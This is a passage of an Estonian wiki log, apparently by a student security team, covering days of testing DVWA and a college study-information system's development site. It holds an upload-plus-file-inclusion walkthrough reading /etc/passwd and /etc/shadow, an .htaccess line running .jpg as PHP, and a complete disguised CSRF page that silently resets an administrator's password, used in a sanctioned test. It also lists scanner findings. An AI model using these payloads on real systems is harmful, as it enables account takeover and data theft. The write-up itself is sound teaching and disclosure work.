&amp;lt;li&amp;gt;Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
  Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
  ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
  data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev ==&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
[[File:PDFHinneteleht.png|200px|thumb|right|Näide hinnetelehest]]&lt;br /&gt;
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.&amp;lt;br&amp;gt;&lt;br /&gt;
Faile saab alla laadida enda profiili all õppesooritustes.&amp;lt;br&amp;gt;&lt;br /&gt;
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.&amp;lt;br&amp;gt;&lt;br /&gt;
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed täiendati url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
====Subgraph Vega ====&lt;br /&gt;
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.&lt;br /&gt;
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.&lt;br /&gt;
Programm on Java põhine graafilise liidesega ja töötab Linux&#039;i, OS X ja Windowsi peal.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]&lt;br /&gt;
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.&lt;br /&gt;
&lt;br /&gt;
Alustasime uut skänni (Start New Scan).&lt;br /&gt;
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.&lt;br /&gt;
&lt;br /&gt;
Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised. &lt;br /&gt;
&lt;br /&gt;
Me lisasime ainult küpsise (cookie) sisu: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
ning Finish.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]&lt;br /&gt;
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).&lt;br /&gt;
&lt;br /&gt;
Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000. &lt;br /&gt;
&lt;br /&gt;
Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script&#039;ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body  nõrkust.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID&#039;sid ja parameetreid ära oma pealkirjades.&lt;br /&gt;
Õnneks parameetritega väljad olid veebilehel korralikult ära escape&#039;itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.&lt;br /&gt;
&lt;br /&gt;
ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.&lt;br /&gt;
&lt;br /&gt;
==== Wapiti ====&lt;br /&gt;
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti. &lt;br /&gt;
(Koduleht: http://wapiti.sourceforge.net/)&lt;br /&gt;
&lt;br /&gt;
Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS&#039;iga midagi teha.&lt;br /&gt;
&lt;br /&gt;
==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====&lt;br /&gt;
=====1. katse - ÕISi keskkkonna keelevahetus =====&lt;br /&gt;
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]&lt;br /&gt;
&lt;br /&gt;
Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.&lt;br /&gt;
&lt;br /&gt;
Võtsime dev-ÕIS&#039;i Source Code&#039;ist välja vastava formi osa ja panime eraldi html faili.&lt;br /&gt;
Koristasime mittevajaliku disaini koodi juurest ära.&lt;br /&gt;
Muutsime form&#039;i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.&lt;br /&gt;
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks &amp;quot;en&amp;quot; ehk inglise keelne keskkond tekiks.&lt;br /&gt;
Panime koodi enose veebiserverisse üles nimega ois.html.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;form id=&amp;quot;settingsForm&amp;quot; method=&amp;quot;post&amp;quot; action=&amp;quot;https://itcollege.dev.ois.ee/setting/edit?user_id=2198&amp;quot; &lt;br /&gt;
enctype=&amp;quot;application/x-www-form-urlencoded&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;input type=&amp;quot;hidden&amp;quot; AUTOCOMPLETE=&amp;quot;off&amp;quot; name=&amp;quot;default_language&amp;quot;value=&amp;quot;en&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;br&amp;gt;&lt;br /&gt;
  &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Salvesta seaded&amp;quot; name=&amp;quot;Savesettings&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;/form&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.&lt;br /&gt;
&lt;br /&gt;
Katsetas koodi enda konto peal Taavi.&lt;br /&gt;
&lt;br /&gt;
=====2. katse - ÕIS&#039;i kasutaja parooli muutmine =====&lt;br /&gt;
&lt;br /&gt;
[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]&lt;br /&gt;
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.&lt;br /&gt;
&lt;br /&gt;
Selle jaoks uurisime välja, kus asub dev-ÕIS&#039;i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.&lt;br /&gt;
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.&lt;br /&gt;
&lt;br /&gt;
Muutsime password ja password_check lahtrite väärtused järgnevaks: &amp;quot;test123&amp;quot; ehk kasutaja uus parool peale rünnakut.&lt;br /&gt;
&lt;br /&gt;
Lahtrites muutsime user_id&#039;d sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.&lt;br /&gt;
&lt;br /&gt;
Kõik vormi lahtrite tüübid määrasime peidetud ehk &amp;quot;hidden&amp;quot;, et poleks midagi näidata. &lt;br /&gt;
&lt;br /&gt;
Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist. &lt;br /&gt;
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.&lt;br /&gt;
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.&lt;br /&gt;
&lt;br /&gt;
Lisasime CSS koodi Submit nupu ära peitmiseks. &lt;br /&gt;
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Salvestasime faili ära kui &amp;quot;screen1.jpg&amp;quot; fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.&lt;br /&gt;
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
 &amp;lt;head&amp;gt;&lt;br /&gt;
  &amp;lt;style type=&amp;quot;text/css&amp;quot;&amp;gt;&lt;br /&gt;
	  #Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }&lt;br /&gt;
  &amp;lt;/style&amp;gt;&lt;br /&gt;
 &amp;lt;/head&amp;gt;&lt;br /&gt;
 &amp;lt;body&amp;gt;&lt;br /&gt;
  &amp;lt;body onload=&amp;quot;document.forms.setPasswordForm.submit();&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;form name=&amp;quot;setPasswordForm&amp;quot; id=&amp;quot;setPasswordForm&amp;quot; &lt;br /&gt;
  action=&amp;quot;https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&amp;amp;amp;continue=/auth/logout&amp;quot;  &lt;br /&gt;
  method=&amp;quot;post&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;user_id&amp;quot; value=&amp;quot;2227&amp;quot; id=&amp;quot;user_id&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;continue&amp;quot; value=&amp;quot;%2Fet%2Fsetting%3Fuser_id%3D2227&amp;quot; id=&amp;quot;continue&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password&amp;quot; id=&amp;quot;password&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password_check&amp;quot; id=&amp;quot;password_check&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;submit&amp;quot; name=&amp;quot;Setpassword&amp;quot; id=&amp;quot;Setpassword&amp;quot; value=&amp;quot;Muuda salasõna&amp;quot; /&amp;gt;&lt;br /&gt;
  &amp;lt;/form&amp;gt;&lt;br /&gt;
 &amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]&lt;br /&gt;
&lt;br /&gt;
Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
AddType application/x-httpd-php .php .jpg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Laadisime mõlemad failid Enose veebiserverisse avalikult. &lt;br /&gt;
&lt;br /&gt;
Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki. &lt;br /&gt;
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.&lt;br /&gt;
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle. &lt;br /&gt;
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.&lt;br /&gt;
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail. &lt;br /&gt;
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja. &lt;br /&gt;
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud &amp;quot;test123&amp;quot;-ks ja me saime ligipääsu administraatori õigustes kontole. &lt;br /&gt;
Rünnak oli edukas.&lt;br /&gt;
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]&lt;br /&gt;
&lt;br /&gt;
Andsime teada Valterile teada, et tegelikult tegime salajase ründe. &lt;br /&gt;
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha. &lt;br /&gt;
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug&#039;iga.&lt;br /&gt;
&lt;br /&gt;
Kuna tegu oli ÕIS&#039;i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.&lt;br /&gt;
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
===Burp suite===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Esimese asjane peale Burp suite käivitamist. Tabilt proxy  -&amp;gt;intercept -&amp;gt;intercept off&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)&amp;lt;br&amp;gt;&lt;br /&gt;
Proxy  -&amp;gt; options alt lülitada sisse proxy listner pordile 8080 .&amp;lt;br&amp;gt;&lt;br /&gt;
Ohvri valimine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida intruder -&amp;gt; target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.&amp;lt;br&amp;gt;&lt;br /&gt;
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.&amp;lt;br&amp;gt;site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.&lt;br /&gt;
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.&amp;lt;br&amp;gt;&lt;br /&gt;
Targer-&amp;gt;scope -&amp;gt; exclude  frome scope ja veenduda at välja on arvatud logout laused.&amp;lt;br&amp;gt;&lt;br /&gt;
Spideringi sisselülitamine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida tab Spide ning sealt panna linnuke kasti spider running.&amp;lt;br&amp;gt;&lt;br /&gt;
Ning oledki valmis saama laheküljelt infot.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.&lt;br /&gt;
&lt;br /&gt;
==Nessuse algkäivitamine==&lt;br /&gt;
Valida backtrackist  vulnerability scannerite alt nessus ning edasi nessus register .&amp;lt;br&amp;gt; Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.&amp;lt;br&amp;gt; Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)&amp;lt;br&amp;gt;&lt;br /&gt;
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt valida nessus start.&amp;lt;br&amp;gt;&lt;br /&gt;
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834 &lt;br /&gt;
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.&amp;lt;br&amp;gt;&lt;br /&gt;
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==Väike upload tegevus, mis võiks olla teisiti==&lt;br /&gt;
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.&lt;br /&gt;
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.&lt;br /&gt;
Proovisime üles laadida: &lt;br /&gt;
&amp;lt;li&amp;gt;filmi&lt;br /&gt;
&amp;lt;li&amp;gt;exe &lt;br /&gt;
&amp;lt;li&amp;gt;jpm faile &lt;br /&gt;
&amp;lt;br&amp;gt;kõik läks läbi ja sai uploadida.&lt;br /&gt;
&amp;lt;br&amp;gt;Sellises kohas võiks olla süsteem tehtud &amp;lt;b&amp;gt;whitelisti&amp;lt;/b&amp;gt; põhimõttel,&lt;br /&gt;
&amp;lt;br&amp;gt;et lubatud oleks ainult: &lt;br /&gt;
&amp;lt;li&amp;gt;.doc &lt;br /&gt;
&amp;lt;li&amp;gt;.docx &lt;br /&gt;
&amp;lt;li&amp;gt;.pdf &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]&lt;br /&gt;
Backtarcki keskkonnas sai testitud programmi w3af.&lt;br /&gt;
&lt;br /&gt;
==== Backtrack: w3af ====&lt;br /&gt;
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]&lt;br /&gt;
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]&lt;br /&gt;
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]&lt;br /&gt;
Võimalik kätte saada SSL Certificate.&lt;br /&gt;
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:&lt;br /&gt;
  https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?&lt;br /&gt;
  username=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&amp;amp;continue=&amp;amp;Login=Logi sisse&amp;amp;pw=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
Programmi sisestatud andmetega ka mitte:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Basic HTTP Authentication:&lt;br /&gt;
    basicAuthUser: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthPass: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthDomain: http://itcollege.dev.ois.ee&lt;br /&gt;
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Cookies&lt;br /&gt;
    cookieJarFile: /root/Desktop/&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;ois_cookie.txt&amp;lt;/font&amp;gt;&lt;br /&gt;
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:&lt;br /&gt;
  # Netscape HTTP Cookie File&lt;br /&gt;
  .dev.ois.ee	TRUE	/	FALSE	1731510001	itcollege_OIS_SESSION_ID	&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;870aqllryuw3cmf6cv8ellha03&amp;lt;/font&amp;gt;&lt;br /&gt;
Esimene rida on nõutav! Teiste tähendused:&lt;br /&gt;
  domain - The domain that created and that can read the variable.&lt;br /&gt;
  flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.&lt;br /&gt;
    This value is set automatically by the browser, depending on the value you set for domain.&lt;br /&gt;
  path - The path within the domain that the variable is valid for.&lt;br /&gt;
  secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.&lt;br /&gt;
  expiration - The UNIX time that the variable will expire on.&lt;br /&gt;
  name - The name of the variable.&lt;br /&gt;
  value - The value of the variable.&lt;br /&gt;
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:&lt;br /&gt;
  Edit -&amp;gt; Preferences -&amp;gt; Privacy -&amp;gt; History -&amp;gt; remove individual cookies&lt;br /&gt;
    Search: itcollege.dev.ois.ee&lt;br /&gt;
    Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Skänneerimine:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The page language is: en&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; has a &amp;quot;&amp;lt;form&amp;gt;&amp;quot; element with auto-complete enabled.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;A comment with the string &amp;quot;&amp;lt;p&amp;amp;gt;tunne end kui koolis&amp;lt;/p&amp;amp;gt;&amp;quot; was found in: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Found a form login. The action of the form is: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  The username field to be used is: &amp;quot;username&amp;quot;.&lt;br /&gt;
  The password field to be used is: &amp;quot;pw&amp;quot;.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;Found authentication credentials to: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;. A correct user and password combination is: Administrador/6666666&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  Antud kasutaja ja parooliga sisse ei saanud.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; returned a response that may contain a &amp;quot;SHA1&amp;quot; hash. The hash is: &amp;quot;c7b39896de5f296b5a44c2dfcd9f0600b2cf424d&amp;quot;. This is uncommon and requires human verification.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; sent these cookies:&amp;lt;/li&amp;gt;&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/&lt;br /&gt;
&amp;lt;li&amp;gt;The SMTP settings in emailReport plugin seem to be incorrect. Original error: &amp;quot;[Errno 111] Connection refused&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Kui tuleb see veateade, siis skänn katkeb.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;SQL injection in a Unknown database was found at: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;, using HTTP method POST.&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The sent post-data was: &amp;quot;username=John8212&amp;amp;security_key_sis_global=d&#039;z&amp;quot;0&amp;amp;Login=Logi%20sisse&amp;amp;continue=56&amp;amp;pw=FrAmE30.&amp;quot;.&lt;br /&gt;
    The modified parameter was &amp;quot;security_key_sis_global&amp;quot;. This vulnerability was found in the request with id 390.&lt;br /&gt;
&amp;lt;li&amp;gt;Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt&amp;lt;/li&amp;gt;&lt;br /&gt;
  User-agent: *&lt;br /&gt;
  Disallow: /&lt;br /&gt;
  Allow: /curriculum&lt;br /&gt;
  Allow: /subject&lt;br /&gt;
  Allow: /diploma&lt;br /&gt;
  Allow: /schedule/ical&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 4. päev - Presentatsiooni tegemine ja esitlemine ==&lt;br /&gt;
&lt;br /&gt;
Koostasime presentatsiooni ja esitlemine.&lt;br /&gt;
&lt;br /&gt;
[[Media:Security_team_presentation.ppt]]&lt;br /&gt;
&lt;br /&gt;
== Arvamused intensiivõppe nädala kohta ==&lt;br /&gt;
&lt;br /&gt;
